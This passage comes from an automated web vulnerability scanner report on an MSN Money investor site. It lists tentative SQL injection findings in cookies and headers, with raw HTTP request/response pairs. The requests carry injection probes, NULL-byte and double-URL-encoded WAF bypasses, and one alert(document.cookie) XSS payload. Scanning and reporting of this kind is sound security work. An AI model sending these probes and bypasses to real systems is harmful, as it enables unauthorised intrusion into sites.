<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">
<meta http-e
...[SNIP]...

1.50. http://redacted/investor/charts/chartdl.aspx [__qca cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://moneycentral.msn.com
Path:   /investor/charts/chartdl.aspx

Issue detail

The __qca cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the __qca cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /investor/charts/chartdl.aspx HTTP/1.1
Host: redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; userCh=4=0&8=0&20=0; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610'; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response 1 (redirected)

HTTP/1.1 200 OK
Content-Length: 3080
Content-Type: text/html
Last-Modified: Wed, 04 Jun 2008 17:06:59 GMT
Accept-Ranges: bytes
ETag: "40a29a6665c6c81:153c9"
Server: Microsoft-IIS/6.0
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
X-UA-Compatible: IE=7
X-Powered-By: ASP.NET
Date: Sun, 30 Jan 2011 18:05:33 GMT
Connection: close

<LINK REL=STYLESHEET HREF=/inc/winstyle.css>
<STYLE TYPE=text/css><!--

.heading3 {color:#CC9900; font-weight: bold;font-size:11pt;font-family: Arial,Helvetica;}
.CatBackground {background:#CC9900
...[SNIP]...
<BR>

If you received this message in error, we apologize for the inconvenience.<BR>
...[SNIP]...

Request 2

GET /investor/charts/chartdl.aspx HTTP/1.1
Host: redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; userCh=4=0&8=0&20=0; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610''; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Sun, 30 Jan 2011 18:05:33 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
X-UA-Compatible: IE=7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-FRAME-OPTIONS: DENY
X-Content-Type-Options: nosniff
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 24654


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">
<meta http-e
...[SNIP]...

1.51. http://redacted/investor/charts/chartdl.aspx [expid cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://moneycentral.msn.com
Path:   /investor/charts/chartdl.aspx

Issue detail

The expid cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the expid cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /investor/charts/chartdl.aspx?symbol=indu22b72%22;alert(document.cookie)//2badde9cef5 HTTP/1.1
Host: redacted
Proxy-Connection: keep-alive
Referer: http://investing.money.redacted/investments/charts?Symbol=indu22b72%22%3balert(document.cookie)//2badde9cef5
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mh=MSFT; CC=US; CULTURE=EN-US; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; __qca=P0-161320755-1294800573610; userCh=4=0&8=0&20=0; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2'; Sample=69; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_cc=true; s_sq=%5B%5BB%5D%5D

Response 1

HTTP/1.1 503 Service Unavailable
Content-Type: text/html
Date: Sun, 30 Jan 2011 15:09:14 GMT
Connection: close
Content-Length: 28

<h1>Service Unavailable</h1>

Request 2

GET /investor/charts/chartdl.aspx?symbol=indu22b72%22;alert(document.cookie)//2badde9cef5 HTTP/1.1
Host: redacted
Proxy-Connection: keep-alive
Referer: http://investing.money.redacted/investments/charts?Symbol=indu22b72%22%3balert(document.cookie)//2badde9cef5
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mh=MSFT; CC=US; CULTURE=EN-US; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; __qca=P0-161320755-1294800573610; userCh=4=0&8=0&20=0; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2''; Sample=69; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_cc=true; s_sq=%5B%5BB%5D%5D

Response 2

HTTP/1.1 200 OK
Cache-Control: no-cache
Date: Sun, 30 Jan 2011 15:09:15 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/6.0
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
X-UA-Compatible: IE=7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-FRAME-OPTIONS: DENY
X-Content-Type-Options: nosniff
Vary: Accept-Encoding
Content-Length: 24815


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">
<meta http-e
...[SNIP]...

1.52. http://redacted/investor/charts/chartdl.aspx [v1st cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://moneycentral.msn.com
Path:   /investor/charts/chartdl.aspx

Issue detail

The v1st cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the v1st cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /investor/charts/chartdl.aspx?symbol= HTTP/1.1
Host: redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; userCh=4=0&8=0&20=0; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4'; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response 1

HTTP/1.1 503 Service Unavailable
Content-Type: text/html
Date: Sun, 30 Jan 2011 02:16:17 GMT
Connection: close
Content-Length: 28

<h1>Service Unavailable</h1>

Request 2

GET /investor/charts/chartdl.aspx?symbol= HTTP/1.1
Host: redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; userCh=4=0&8=0&20=0; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4''; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Sun, 30 Jan 2011 02:16:18 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
X-UA-Compatible: IE=7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-FRAME-OPTIONS: DENY
X-Content-Type-Options: nosniff
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 24661


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">
<meta http-e
...[SNIP]...

1.53. http://redacted/investor/home.aspx [CC cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://moneycentral.msn.com
Path:   /investor/home.aspx

Issue detail

The CC cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the CC cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /investor/home.aspx HTTP/1.1
Host: redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US%00'; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; userCh=4=0&8=0&20=0; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response 1

HTTP/1.1 503 Service Unavailable
Content-Type: text/html
Date: Sun, 30 Jan 2011 18:02:44 GMT
Connection: close
Content-Length: 28

<h1>Service Unavailable</h1>

Request 2

GET /investor/home.aspx HTTP/1.1
Host: redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US%00''; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; userCh=4=0&8=0&20=0; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response 2

HTTP/1.1 301 Moved Permanently
Connection: close
Date: Sun, 30 Jan 2011 18:02:45 GMT
Server: Microsoft-IIS/6.0
Location: http://money.redacted/investing
Content-Length: 62

object moved <a href="http://money.msn.com/investing">here</a>

1.54. http://redacted/investor/home.aspx [CULTURE cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://moneycentral.msn.com
Path:   /investor/home.aspx

Issue detail

The CULTURE cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the CULTURE cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the CULTURE cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /investor/home.aspx HTTP/1.1
Host: redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US%2527; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; userCh=4=0&8=0&20=0; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response 1

HTTP/1.1 503 Service Unavailable
Content-Type: text/html
Date: Sun, 30 Jan 2011 18:02:16 GMT
Connection: close
Content-Length: 28

<h1>Service Unavailable</h1>

Request 2

GET /investor/home.aspx HTTP/1.1
Host: redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US%2527%2527; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; userCh=4=0&8=0&20=0; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response 2

HTTP/1.1 301 Moved Permanently
Connection: close
Date: Sun, 30 Jan 2011 18:02:18 GMT
Server: Microsoft-IIS/6.0
Location: http://money.redacted/investing
Content-Length: 62

object moved <a href="http://money.msn.com/investing">here</a>

1.55. http://redacted/investor/home.aspx [User-Agent HTTP header]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://moneycentral.msn.com
Path:   /investor/home.aspx

Issue detail

The User-Agent HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the User-Agent HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the User-Agent HTTP header as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /investor/home.aspx HTTP/1.1
Host: redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)%2527
Connection: close
Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; userCh=4=0&8=0&20=0; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response 1

HTTP/1.1 503 Service Unavailable
Content-Type: text/html
Date: Sun, 30 Jan 2011 18:03:26 GMT
Connection: close
Content-Length: 28

<h1>Service Unavailable</h1>

Request 2

GET /investor/home.aspx HTTP/1.1
Host: redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)%2527%2527
Connection: close
Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; userCh=4=0&8=0&20=0; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response 2

HTTP/1.1 301 Moved Permanently
Connection: close
Date: Sun, 30 Jan 2011 18:03:27 GMT
Server: Microsoft-IIS/6.0
Location: http://money.redacted/investing
Content-Length: 62

object moved <a href="http://money.msn.com/investing">here</a>

1.56. http://redacted/investor/market/exchangerates.aspx [Referer HTTP header]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://moneycentral.msn.com
Path:   /investor/market/exchangerates.aspx

Issue detail

The Referer HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the Referer HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /investor/market/exchangerates.aspx HTTP/1.1
Host: redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; userCh=4=0&8=0&20=0; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;
Referer: http://www.google.com/search?hl=en&q=%00'

Response 1 (redirected)

HTTP/1.1 200 OK
Content-Length: 3080
Content-Type: text/html
Last-Modified: Wed, 04 Jun 2008 17:06:59 GMT
Accept-Ranges: bytes
ETag: "40a29a6665c6c81:1427c"
Server: Microsoft-IIS/6.0
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
X-UA-Compatible: IE=7
X-Powered-By: ASP.NET
Date: Sun, 30 Jan 2011 02:16:30 GMT
Connection: close

<LINK REL=STYLESHEET HREF=/inc/winstyle.css>
<STYLE TYPE=text/css><!--

.heading3 {color:#CC9900; font-weight: bold;font-size:11pt;font-family: Arial,Helvetica;}
.CatBackground {background:#CC9900
...[SNIP]...
<BR>

If you received this message in error, we apologize for the inconvenience.<BR>
...[SNIP]...

Request 2

GET /investor/market/exchangerates.aspx HTTP/1.1
Host: redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; userCh=4=0&8=0&20=0; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;
Referer: http://www.google.com/search?hl=en&q=%00''

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Sun, 30 Jan 2011 02:16:31 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
X-UA-Compatible: IE=7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 28746

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US"><head><meta http-e
...[SNIP]...

1.57. http://redacted/investor/market/exchangerates.aspx [Sample cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://moneycentral.msn.com
Path:   /investor/market/exchangerates.aspx

Issue detail

The Sample cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the Sample cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the Sample cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /investor/market/exchangerates.aspx HTTP/1.1
Host: redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69%2527; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; userCh=4=0&8=0&20=0; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response 1

HTTP/1.1 503 Service Unavailable
Content-Type: text/html
Date: Sun, 30 Jan 2011 18:04:26 GMT
Connection: close
Content-Length: 28

<h1>Service Unavailable</h1>

Request 2

GET /investor/market/exchangerates.aspx HTTP/1.1
Host: redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69%2527%2527; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; userCh=4=0&8=0&20=0; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Sun, 30 Jan 2011 18:04:27 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
X-UA-Compatible: IE=7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 28682

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US"><head><meta http-e
...[SNIP]...

1.58. http://redacted/investor/market/treasuries.aspx [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://moneycentral.msn.com
Path:   /investor/market/treasuries.aspx

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /investor%2527/market/treasuries.aspx HTTP/1.1
Host: redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; userCh=4=0&8=0&20=0; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response 1 (redirected)

HTTP/1.1 200 OK
Content-Length: 3080
Content-Type: text/html
Last-Modified: Wed, 04 Jun 2008 17:06:59 GMT
Accept-Ranges: bytes
ETag: "40a29a6665c6c81:153c9"
Server: Microsoft-IIS/6.0
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
X-UA-Compatible: IE=7
X-Powered-By: ASP.NET
Date: Sun, 30 Jan 2011 18:05:47 GMT
Connection: close

<LINK REL=STYLESHEET HREF=/inc/winstyle.css>
<STYLE TYPE=text/css><!--

.heading3 {color:#CC9900; font-weight: bold;font-size:11pt;font-family: Arial,Helvetica;}
.CatBackground {background:#CC9900
...[SNIP]...
<BR>

If you received this message in error, we apologize for the inconvenience.<BR>
...[SNIP]...

Request 2

GET /investor%2527%2527/market/treasuries.aspx HTTP/1.1
Host: redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; userCh=4=0&8=0&20=0; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response 2

HTTP/1.1 503 Service Unavailable
Content-Type: text/html
Date: Sun, 30 Jan 2011 18:05:48 GMT
Connection: close
Content-Length: 28

<h1>Service Unavailable</h1>

1.59. http://redacted/investor/market/treasuries.aspx [s_cc cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://moneycentral.msn.com
Path:   /investor/market/treasuries.aspx

Issue detail

The s_cc cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the s_cc cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /investor/market/treasuries.aspx HTTP/1.1
Host: redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true%00'; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; userCh=4=0&8=0&20=0; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Sun, 30 Jan 2011 18:04:33 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
X-UA-Compatible: IE=7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 23413

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US"><head><meta http-e
...[SNIP]...
<script type="text/javascript">
